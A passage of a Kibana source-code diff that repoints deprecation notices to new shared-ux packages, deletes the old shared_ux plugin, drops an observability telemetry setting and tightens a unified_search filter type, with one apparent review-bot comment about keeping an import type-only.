--- a/src/plugins/kibana_overview/public/components/overview/overview.tsx +++ b/src/plugins/kibana_overview/public/components/overview/overview.tsx @@ -25,7 +25,7 @@ import { overviewPageActions, OverviewPageFooter, } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { KibanaSolutionAvatar } from '@kbn/shared-ux-avatar-solution'; import { AnalyticsNoDataPageKibanaProvider, diff --git a/src/plugins/kibana_react/public/app_links/index.ts b/src/plugins/kibana_react/public/app_links/index.ts index ca09b2a3bfe36..3bfd7baca0c02 100644 --- a/src/plugins/kibana_react/public/app_links/index.ts +++ b/src/plugins/kibana_react/public/app_links/index.ts @@ -5,5 +5,5 @@ * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ -/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-components */ +/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-link-redirect-app` */ export { RedirectAppLinks } from './redirect_app_link'; diff --git a/src/plugins/kibana_react/public/app_links/redirect_app_link.test.tsx b/src/plugins/kibana_react/public/app_links/redirect_app_link.test.tsx index 133cab06e6b6f..f4ce0d3ff80d3 100644 --- a/src/plugins/kibana_react/public/app_links/redirect_app_link.test.tsx +++ b/src/plugins/kibana_react/public/app_links/redirect_app_link.test.tsx @@ -9,7 +9,7 @@ import React, { MouseEvent } from 'react'; import { mount } from 'enzyme'; import { applicationServiceMock } from '@kbn/core/public/mocks'; -/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-components */ +/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-link-redirect-app` */ import { RedirectAppLinks } from './redirect_app_link'; import { BehaviorSubject } from 'rxjs'; 
diff --git a/src/plugins/kibana_react/public/app_links/redirect_app_link.tsx b/src/plugins/kibana_react/public/app_links/redirect_app_link.tsx index 339055c3e1da5..6df1c43dbc5c6 100644 --- a/src/plugins/kibana_react/public/app_links/redirect_app_link.tsx +++ b/src/plugins/kibana_react/public/app_links/redirect_app_link.tsx @@ -35,7 +35,7 @@ interface RedirectCrossAppLinksProps extends React.HTMLAttributes = ({ diff --git a/src/plugins/kibana_react/public/exit_full_screen_button/exit_full_screen_button.tsx b/src/plugins/kibana_react/public/exit_full_screen_button/exit_full_screen_button.tsx index 33871742acbb3..f611c391a20a2 100644 --- a/src/plugins/kibana_react/public/exit_full_screen_button/exit_full_screen_button.tsx +++ b/src/plugins/kibana_react/public/exit_full_screen_button/exit_full_screen_button.tsx @@ -101,5 +101,5 @@ class ExitFullScreenButtonUi extends PureComponent { } } -/** @deprecated Use `ExitFullScreenButton` from `src/plugins/shared_ux/public`. */ +/** @deprecated Use `ExitFullScreenButton` from `@kbn/shared-ux-button-exit-full-screen`. */ export const ExitFullScreenButton = ExitFullScreenButtonUi; diff --git a/src/plugins/kibana_react/public/index.ts b/src/plugins/kibana_react/public/index.ts index 4b4c0b6e5ab20..2244d3d5503e0 100644 --- a/src/plugins/kibana_react/public/index.ts +++ b/src/plugins/kibana_react/public/index.ts @@ -82,7 +82,7 @@ export { reactToUiComponent, uiToReactComponent } from './adapters'; export { toMountPoint, MountPointPortal } from './util'; export type { ToMountPointOptions } from './util'; -/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-components */ +/** @deprecated Use `RedirectAppLinks` from `@kbn/shared-ux-link-redirect-app` */ export { RedirectAppLinks } from './app_links'; export { wrapWithTheme, KibanaThemeProvider } from './theme'; 
diff --git a/src/plugins/kibana_react/public/page_template/page_template.tsx b/src/plugins/kibana_react/public/page_template/page_template.tsx index bd5213c9a2608..44edccd8ea49b 100644 --- a/src/plugins/kibana_react/public/page_template/page_template.tsx +++ b/src/plugins/kibana_react/public/page_template/page_template.tsx @@ -21,7 +21,7 @@ import { KibanaPageTemplateInner, KibanaPageTemplateWithSolutionNav } from './pa /** * A thin wrapper around EuiPageTemplate with a few Kibana specific additions - * @deprecated Use `KibanaPageTemplateProps` from `kbn-shared-ux-components`. + * @deprecated Use `KibanaPageTemplateProps` from `@kbn/shared-ux-page-kibana-template-types`. */ export type KibanaPageTemplateProps = EuiPageTemplateProps & { /** @@ -42,7 +42,7 @@ export type KibanaPageTemplateProps = EuiPageTemplateProps & { noDataConfig?: NoDataPageProps; }; -/** @deprecated Use `KibanaPageTemplate` from `kbn-shared-ux-components`. */ +/** @deprecated Use `KibanaPageTemplate` from `@kbn/shared-ux-page-kibana-template`. */ export const KibanaPageTemplate: FunctionComponent = ({ template, className, diff --git a/src/plugins/kibana_usage_collection/server/collectors/management/schema.ts b/src/plugins/kibana_usage_collection/server/collectors/management/schema.ts index f1b230b72c337..97431c638273d 100644 --- a/src/plugins/kibana_usage_collection/server/collectors/management/schema.ts +++ b/src/plugins/kibana_usage_collection/server/collectors/management/schema.ts @@ -430,10 +430,6 @@ export const stackManagementSchema: MakeSchemaFrom = { type: 'boolean', _meta: { description: 'Non-default value of setting.' }, }, - 'observability:enableInfrastructureView': { - type: 'boolean', - _meta: { description: 'Non-default value of setting.' }, - }, 'observability:enableServiceGroups': { type: 'boolean', _meta: { description: 'Non-default value of setting.' }, 
diff --git a/src/plugins/kibana_usage_collection/server/collectors/management/types.ts b/src/plugins/kibana_usage_collection/server/collectors/management/types.ts index 1a946e99f29bd..1b7a64d0cc590 100644 --- a/src/plugins/kibana_usage_collection/server/collectors/management/types.ts +++ b/src/plugins/kibana_usage_collection/server/collectors/management/types.ts @@ -41,7 +41,6 @@ export interface UsageStats { 'observability:enableNewSyntheticsView': boolean; 'observability:maxSuggestions': number; 'observability:enableComparisonByDefault': boolean; - 'observability:enableInfrastructureView': boolean; 'observability:enableServiceGroups': boolean; 'visualize:enableLabs': boolean; 'visualization:heatmap:maxBuckets': number; diff --git a/src/plugins/presentation_util/public/components/solution_toolbar/index.ts b/src/plugins/presentation_util/public/components/solution_toolbar/index.ts index 5828abda1107f..ee60678af5d87 100644 --- a/src/plugins/presentation_util/public/components/solution_toolbar/index.ts +++ b/src/plugins/presentation_util/public/components/solution_toolbar/index.ts @@ -7,5 +7,5 @@ */ export { SolutionToolbar } from './solution_toolbar'; -/** @deprecated QuickButtonGroup - use `IconButtonGroup` from `@kbn/shared-ux-components */ +/** @deprecated QuickButtonGroup - use `IconButtonGroup` from `@kbn/shared-ux-button-toolbar` */ export * from './items'; diff --git a/src/plugins/shared_ux/.i18nrc.json b/src/plugins/shared_ux/.i18nrc.json deleted file mode 100755 index cd7ac5b866df2..0000000000000 --- a/src/plugins/shared_ux/.i18nrc.json +++ /dev/null @@ -1,9 +0,0 @@ -{ - "prefix": "sharedUX", - "paths": { - "sharedUX": "." - }, - "translations": [ - "translations/ja-JP.json" - ] -} diff --git a/src/plugins/shared_ux/README.md b/src/plugins/shared_ux/README.md deleted file mode 100755 index 748414c356e9b..0000000000000 --- a/src/plugins/shared_ux/README.md +++ /dev/null 
@@ -1,29 +0,0 @@ -# sharedUX - -Our mission is to make consistency in our user experience a product. - -## Areas of Focus - -### UX Infrastructure - -- Create and maintain a discoverable home for shared UX code. -- Encourage contribution and usage. - -### UX Patterns - -- Work with design specialists to understand and communicate new and existing designs. -- Foster adoption of design principles by codifying them in shared resources. - -### UX Solutions - -- Drive common projects. -- Build and support common plugins. -- Help teams to create consistent user experiences. - -## The sharedUX Plugin - -This plugin contains common code that is shared among other plugins. - -## Contribution - -Contributions are welcome and encouraged! \ No newline at end of file diff --git a/src/plugins/shared_ux/docs/about.mdx b/src/plugins/shared_ux/docs/about.mdx deleted file mode 100644 index 213ce774be217..0000000000000 --- a/src/plugins/shared_ux/docs/about.mdx +++ /dev/null @@ -1,36 +0,0 @@ ---- -id: sharedUX/About -slug: /shared-ux/about -title: About Shared UX -description: . -date: 2021-01-05 -tags: ['shared-ux'] ---- - -Our mission is to make consistency in our user experience a product. - -## Areas of Focus - -### UX Infrastructure - -- Create and maintain a discoverable home for shared UX code. -- Encourage contribution and usage. - -### UX Patterns - -- Work with design specialists to understand and communicate new and existing designs. -- Foster adoption of design principles by codifying them in shared resources. - -### UX Solutions - -- Drive common projects. -- Build and support common plugins. -- Help teams to create consistent user experiences. - -## The sharedUX Plugin - -This plugin contains common code that is shared among other plugins. - -## Contribution - -Contributions are welcome and encouraged! diff --git a/src/plugins/shared_ux/kibana.json b/src/plugins/shared_ux/kibana.json deleted file mode 100755 index 308a252f70b54..0000000000000 
--- a/src/plugins/shared_ux/kibana.json +++ /dev/null @@ -1,14 +0,0 @@ -{ - "id": "sharedUX", - "version": "1.0.0", - "kibanaVersion": "kibana", - "owner": { - "name": "Shared UX", - "githubTeam": "shared-ux" - }, - "description": "A plugin providing components and services for shared user experiences in Kibana.", - "server": true, - "ui": true, - "requiredPlugins": ["dataViewEditor", "dataViews"], - "optionalPlugins": [] -} diff --git a/src/plugins/shared_ux/nav_shared_ux.docnav.json b/src/plugins/shared_ux/nav_shared_ux.docnav.json deleted file mode 100644 index 8f6ad010a49cb..0000000000000 --- a/src/plugins/shared_ux/nav_shared_ux.docnav.json +++ /dev/null @@ -1,17 +0,0 @@ -{ - "mission": "Shared UX", - "id": "sharedUX", - "landingPageId": "sharedUX/About", - "icon": "globe", - "description": "Developer documentation for Shared UX.", - "items": [ - { - "label": "About", - "items": [ - { - "id": "sharedUX/About" - } - ] - } - ] -} diff --git a/src/plugins/shared_ux/public/index.ts b/src/plugins/shared_ux/public/index.ts deleted file mode 100755 index 1dcf84eaf4991..0000000000000 --- a/src/plugins/shared_ux/public/index.ts +++ /dev/null @@ -1,18 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUXPlugin } from './plugin'; - -/** - * Creates the Shared UX plugin. - */ -export function plugin() { - return new SharedUXPlugin(); -} - -export type { SharedUXPluginSetup, SharedUXPluginStart } from './types'; diff --git a/src/plugins/shared_ux/public/mocks.ts b/src/plugins/shared_ux/public/mocks.ts deleted file mode 100644 index c77236d503ca9..0000000000000 --- a/src/plugins/shared_ux/public/mocks.ts +++ /dev/null 
@@ -1,23 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUXPlugin } from './plugin'; - -export type Setup = jest.Mocked>; -export type Start = jest.Mocked>; - -const createStartContract = (): jest.Mocked => { - const startContract = { - getContextServices: jest.fn(), - }; - return startContract; -}; - -export const sharedUXPluginMock = { - createStartContract, -}; diff --git a/src/plugins/shared_ux/public/plugin.ts b/src/plugins/shared_ux/public/plugin.ts deleted file mode 100755 index 8806de85b9304..0000000000000 --- a/src/plugins/shared_ux/public/plugin.ts +++ /dev/null 
@@ -1,39 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { CoreSetup, CoreStart, Plugin } from '@kbn/core/public'; -import { - SharedUXPluginSetup, - SharedUXPluginStart, - SharedUXPluginStartDeps, - SharedUXPluginSetupDeps, -} from './types'; - -import { servicesFactory } from './services'; - -/** - * The Kibana plugin for Shared User Experience (Shared UX). - */ -export class SharedUXPlugin implements Plugin { - public setup( - _coreSetup: CoreSetup, - _setupPlugins: SharedUXPluginSetupDeps - ): SharedUXPluginSetup { - return {}; - } - - public start(coreStart: CoreStart, startPlugins: SharedUXPluginStartDeps): SharedUXPluginStart { - const services = servicesFactory({ coreStart, startPlugins }); - - return { - getContextServices: () => services, - }; - } - - public stop() {} -} diff --git a/src/plugins/shared_ux/public/services/application.ts b/src/plugins/shared_ux/public/services/application.ts deleted file mode 100644 index 95d6d4b4d72d9..0000000000000 --- a/src/plugins/shared_ux/public/services/application.ts +++ /dev/null 
@@ -1,25 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxApplicationService } from '@kbn/shared-ux-services'; - -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type ApplicationServiceFactory = KibanaPluginServiceFactory< - SharedUxApplicationService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXEditorsService`. - */ -export const applicationServiceFactory: ApplicationServiceFactory = ({ coreStart }) => ({ - navigateToUrl: coreStart.application.navigateToUrl, - currentAppId$: coreStart.application.currentAppId$, -}); diff --git a/src/plugins/shared_ux/public/services/data.ts b/src/plugins/shared_ux/public/services/data.ts deleted file mode 100644 index d68d35848e812..0000000000000 --- a/src/plugins/shared_ux/public/services/data.ts +++ /dev/null 
@@ -1,25 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxDataService } from '@kbn/shared-ux-services'; -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type DataServiceFactory = KibanaPluginServiceFactory< - SharedUxDataService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXDataService`. - */ -export const dataServiceFactory: DataServiceFactory = ({ coreStart, startPlugins }) => ({ - hasDataView: startPlugins.dataViews.hasData.hasDataView, - hasESData: startPlugins.dataViews.hasData.hasESData, - hasUserDataView: startPlugins.dataViews.hasData.hasUserDataView, -}); diff --git a/src/plugins/shared_ux/public/services/doc_links.ts b/src/plugins/shared_ux/public/services/doc_links.ts deleted file mode 100644 index b457cddb7c3bc..0000000000000 --- a/src/plugins/shared_ux/public/services/doc_links.ts +++ /dev/null 
@@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxDocLinksService } from '@kbn/shared-ux-services'; - -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type DocLinksServiceFactory = KibanaPluginServiceFactory< - SharedUxDocLinksService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXEditorsService`. - */ -export const docLinksServiceFactory: DocLinksServiceFactory = ({ coreStart }) => ({ - dataViewsDocLink: coreStart.docLinks.links.indexPatterns?.introduction, -}); diff --git a/src/plugins/shared_ux/public/services/editors.ts b/src/plugins/shared_ux/public/services/editors.ts deleted file mode 100644 index 498b42954091c..0000000000000 --- a/src/plugins/shared_ux/public/services/editors.ts +++ /dev/null 
@@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxEditorsService } from '@kbn/shared-ux-services'; - -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type EditorsServiceFactory = KibanaPluginServiceFactory< - SharedUxEditorsService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXEditorsService`. - */ -export const editorsServiceFactory: EditorsServiceFactory = ({ startPlugins }) => ({ - openDataViewEditor: startPlugins.dataViewEditor.openEditor, -}); diff --git a/src/plugins/shared_ux/public/services/http.ts b/src/plugins/shared_ux/public/services/http.ts deleted file mode 100644 index afc2f00713988..0000000000000 --- a/src/plugins/shared_ux/public/services/http.ts +++ /dev/null 
@@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxHttpService } from '@kbn/shared-ux-services'; - -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type HttpServiceFactory = KibanaPluginServiceFactory< - SharedUxHttpService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXEditorsService`. - */ -export const httpServiceFactory: HttpServiceFactory = ({ coreStart }) => ({ - addBasePath: coreStart.http.basePath.prepend, -}); diff --git a/src/plugins/shared_ux/public/services/index.ts b/src/plugins/shared_ux/public/services/index.ts deleted file mode 100644 index c8a572c262518..0000000000000 --- a/src/plugins/shared_ux/public/services/index.ts +++ /dev/null 
@@ -1,36 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxServices } from '@kbn/shared-ux-services'; - -import type { SharedUXPluginStartDeps } from '../types'; -import type { KibanaPluginServiceFactory } from './types'; - -import { platformServiceFactory } from './platform'; -import { userPermissionsServiceFactory } from './permissions'; -import { editorsServiceFactory } from './editors'; -import { docLinksServiceFactory } from './doc_links'; -import { httpServiceFactory } from './http'; -import { applicationServiceFactory } from './application'; -import { dataServiceFactory } from './data'; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXServices`. - */ -export const servicesFactory: KibanaPluginServiceFactory< - SharedUxServices, - SharedUXPluginStartDeps -> = (params) => ({ - platform: platformServiceFactory(params), - permissions: userPermissionsServiceFactory(params), - editors: editorsServiceFactory(params), - docLinks: docLinksServiceFactory(params), - http: httpServiceFactory(params), - application: applicationServiceFactory(params), - data: dataServiceFactory(params), -}); diff --git a/src/plugins/shared_ux/public/services/permissions.ts b/src/plugins/shared_ux/public/services/permissions.ts deleted file mode 100644 index 694405b5c6610..0000000000000 --- a/src/plugins/shared_ux/public/services/permissions.ts +++ /dev/null 
@@ -1,27 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxUserPermissionsService } from '@kbn/shared-ux-services'; -import { KibanaPluginServiceFactory } from './types'; -import { SharedUXPluginStartDeps } from '../types'; - -export type UserPermissionsServiceFactory = KibanaPluginServiceFactory< - SharedUxUserPermissionsService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXPermissionsService`. - */ -export const userPermissionsServiceFactory: UserPermissionsServiceFactory = ({ - coreStart, - startPlugins, -}) => ({ - canCreateNewDataView: startPlugins.dataViewEditor.userPermissions.editDataView(), - canAccessFleet: coreStart.application.capabilities.navLinks.integrations, -}); diff --git a/src/plugins/shared_ux/public/services/platform.ts b/src/plugins/shared_ux/public/services/platform.ts deleted file mode 100644 index b0ee61583dd8d..0000000000000 --- a/src/plugins/shared_ux/public/services/platform.ts +++ /dev/null 
@@ -1,26 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { SharedUxPlatformService } from '@kbn/shared-ux-services'; -import { SharedUXPluginStartDeps } from '../types'; -import { KibanaPluginServiceFactory } from './types'; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXPlatformService`. - */ -export type PlatformServiceFactory = KibanaPluginServiceFactory< - SharedUxPlatformService, - SharedUXPluginStartDeps ->; - -/** - * A factory function for creating a Kibana-based implementation of `SharedUXPlatformService`. - */ -export const platformServiceFactory: PlatformServiceFactory = ({ coreStart }) => ({ - setIsFullscreen: (isVisible: boolean) => coreStart.chrome.setIsVisible(isVisible), -}); diff --git a/src/plugins/shared_ux/public/services/types.ts b/src/plugins/shared_ux/public/services/types.ts deleted file mode 100644 index 895b2fb231a37..0000000000000 --- a/src/plugins/shared_ux/public/services/types.ts +++ /dev/null 
@@ -1,33 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { BehaviorSubject } from 'rxjs'; -import { CoreStart, AppUpdater, PluginInitializerContext } from '@kbn/core/public'; - -/** - * Parameters necessary to create a Kibana-based service, (e.g. during Plugin - * startup or setup). - * - * The `Start` generic refers to the specific Plugin `TPluginsStart`. - */ -export interface KibanaPluginServiceParams { - coreStart: CoreStart; - startPlugins: Start; - appUpdater?: BehaviorSubject; - initContext?: PluginInitializerContext; -} - -/** - * A factory function for creating a Kibana-based service. - * - * The `Service` generic determines the shape of the Service being produced. - * The `Start` generic refers to the specific Plugin `TPluginsStart`. - */ -export type KibanaPluginServiceFactory = ( - params: KibanaPluginServiceParams -) => Service; diff --git a/src/plugins/shared_ux/public/types/index.ts b/src/plugins/shared_ux/public/types/index.ts deleted file mode 100644 index e3e7cb760268f..0000000000000 --- a/src/plugins/shared_ux/public/types/index.ts +++ /dev/null 
@@ -1,67 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/* eslint-disable @typescript-eslint/no-empty-interface */ - -import { SharedUxServices } from '@kbn/shared-ux-services'; -import { DataViewEditorStart } from '@kbn/data-view-editor-plugin/public'; -import { DataViewsPublicPluginStart } from '@kbn/data-views-plugin/public'; - -/** @internal */ -export interface SharedUXPluginSetup {} - -/** - * The Shared UX plugin public contract, containing prewired components, services, and - * other constructs useful to consumers. - */ -export interface SharedUXPluginStart { - /** - * A set of pre-wired services for use with `SharedUxServicesProvider`. - * - * ``` - * import { SharedUxServicesProvider } from '@kbn/shared-ux-services'; - * - * public start(coreStart: CoreStart, startPlugins: MyPluginStartDeps): MyPluginStart { - * const services = startPlugins.sharedUX.getContextServices(); - * return { - * ServicesContext: ({ children }) => {children}, - * }; - * } - * ``` - * - * or - * - * ``` - * import { SharedUxServicesProvider } from '@kbn/shared-ux-services'; - * - * public setup(coreSetup: CoreSetup, setupPlugins: MyPluginSetupDeps): MyPluginSetup { - * const [coreStart, startPlugins] = await coreSetup.getStartServices(); - * coreSetup.application.register({ - * mount: async (params: AppMountParameters) => { - * ReactDOM.render( - * - * - * , - * params.element - * ); - * } - * ); - * } - * ``` - */ - getContextServices: () => SharedUxServices; -} - -/** @internal */ -export interface SharedUXPluginSetupDeps {} - -/** @internal */ -export interface SharedUXPluginStartDeps { - dataViewEditor: DataViewEditorStart; - dataViews: 
DataViewsPublicPluginStart; -} diff --git a/src/plugins/shared_ux/server/index.ts b/src/plugins/shared_ux/server/index.ts deleted file mode 100755 index 44c72b244aaf9..0000000000000 --- a/src/plugins/shared_ux/server/index.ts +++ /dev/null @@ -1,16 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { PluginInitializerContext } from '@kbn/core/server'; -import { SharedUXPlugin } from './plugin'; - -export function plugin(initializerContext: PluginInitializerContext) { - return new SharedUXPlugin(initializerContext); -} - -export type { SharedUXPluginSetup, SharedUXPluginStart } from './types'; diff --git a/src/plugins/shared_ux/server/plugin.ts b/src/plugins/shared_ux/server/plugin.ts deleted file mode 100755 index f0ea504884610..0000000000000 --- a/src/plugins/shared_ux/server/plugin.ts +++ /dev/null 
@@ -1,31 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { PluginInitializerContext, CoreSetup, CoreStart, Plugin, Logger } from '@kbn/core/server'; - -import { SharedUXPluginSetup, SharedUXPluginStart } from './types'; - -export class SharedUXPlugin implements Plugin { - private readonly logger: Logger; - - constructor(initializerContext: PluginInitializerContext) { - this.logger = initializerContext.logger.get(); - } - - public setup(_core: CoreSetup) { - this.logger.debug('sharedUX: Setup'); - return {}; - } - - public start(_core: CoreStart) { - this.logger.debug('sharedUX: Started'); - return {}; - } - - public stop() {} -} diff --git a/src/plugins/shared_ux/server/types.ts b/src/plugins/shared_ux/server/types.ts deleted file mode 100755 index b16a18467d309..0000000000000 --- a/src/plugins/shared_ux/server/types.ts +++ /dev/null @@ -1,15 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -/* eslint-disable @typescript-eslint/no-empty-interface */ - -/** @internal */ -export interface SharedUXPluginSetup {} - -/** @internal */ -export interface SharedUXPluginStart {} diff --git a/src/plugins/shared_ux/tsconfig.json b/src/plugins/shared_ux/tsconfig.json deleted file mode 100644 index 3a287353a5341..0000000000000 --- a/src/plugins/shared_ux/tsconfig.json +++ /dev/null 
@@ -1,26 +0,0 @@ -{ - "extends": "../../../tsconfig.base.json", - "compilerOptions": { - "outDir": "./target/types", - "emitDeclarationOnly": true, - "declaration": true, - "declarationMap": true - }, - "include": [ - "common/**/*", - "public/**/*", - "server/**/*", - "../../../typings/**/*" - ], - "references": [ - { - "path": "../../core/tsconfig.json" - }, - { - "path": "../data_view_editor/tsconfig.json" - }, - { - "path": "../data_views/tsconfig.json" - } - ] -} diff --git a/src/plugins/telemetry/schema/oss_plugins.json b/src/plugins/telemetry/schema/oss_plugins.json index cacd8067e4e03..e59b192442133 100644 --- a/src/plugins/telemetry/schema/oss_plugins.json +++ b/src/plugins/telemetry/schema/oss_plugins.json @@ -8282,12 +8282,6 @@ "description": "Non-default value of setting." } }, - "observability:enableInfrastructureView": { - "type": "boolean", - "_meta": { - "description": "Non-default value of setting." - } - }, "observability:enableServiceGroups": { "type": "boolean", "_meta": { diff --git a/src/plugins/unified_search/public/actions/apply_filter_action.ts b/src/plugins/unified_search/public/actions/apply_filter_action.ts index e890cd94375c3..4f2900944f827 100644 --- a/src/plugins/unified_search/public/actions/apply_filter_action.ts +++ b/src/plugins/unified_search/public/actions/apply_filter_action.ts @@ -8,6 +8,7 @@ import { i18n } from '@kbn/i18n'; import { ThemeServiceSetup } from '@kbn/core/public'; +import type { IEmbeddable } from '@kbn/embeddable-plugin/public'; import { toMountPoint } from '@kbn/kibana-react-plugin/public'; import { Action, createAction, IncompatibleActionError } from '@kbn/ui-actions-plugin/public'; // for cleanup esFilters need to fix the issue https://github.com/elastic/kibana/issues/131292 
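Review bot: The new `import type { IEmbeddable } from '@kbn/embeddable-plugin/public';` line carries no note that the import must stay type-only, while the comment the commit removes from `ApplyGlobalFilterActionContext` in the next hunk (`embeddable?: unknown` with its circular-dependency explanation) was the only record of that constraint. A one-line comment above the import, `// Type-only on purpose: per the previous comment a value import of the embeddable plugin would create a circular dependency.`, keeps the reason visible now that the unified_search tsconfig also gains a project reference to embeddable further down in this diff. Whether the project references themselves now form a cycle cannot be judged from this diff and is worth confirming with a `tsc -b` run.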
@@ -21,9 +22,7 @@ export const ACTION_GLOBAL_APPLY_FILTER = 'ACTION_GLOBAL_APPLY_FILTER'; export interface ApplyGlobalFilterActionContext { filters: Filter[]; timeFieldName?: string; - // Need to make this unknown to prevent circular dependencies. - // Apps using this property will need to cast to `IEmbeddable`. - embeddable?: unknown; + embeddable?: IEmbeddable; // controlledBy is an optional key in filter.meta that identifies the owner of a filter // Pass controlledBy to cleanup an existing filter(s) owned by embeddable prior to adding new filters controlledBy?: string; diff --git a/src/plugins/unified_search/public/index_pattern_select/index_pattern_select.tsx b/src/plugins/unified_search/public/index_pattern_select/index_pattern_select.tsx index 81534575d10b1..7cd8b9d0251d8 100644 --- a/src/plugins/unified_search/public/index_pattern_select/index_pattern_select.tsx +++ b/src/plugins/unified_search/public/index_pattern_select/index_pattern_select.tsx @@ -78,10 +78,10 @@ export default class IndexPatternSelect extends Component { - const idsAndTitles = await this.props.indexPatternService.getIdsWithTitle(); + const dataViews = await this.props.indexPatternService.getIdsWithTitle(); if (!this.isMounted || searchValue !== this.state.searchValue) { return; } const options = []; - for (let i = 0; i < idsAndTitles.length; i++) { - if (idsAndTitles[i].title.toLowerCase().includes(searchValue.toLowerCase())) { + for (let i = 0; i < dataViews.length; i++) { + const label = 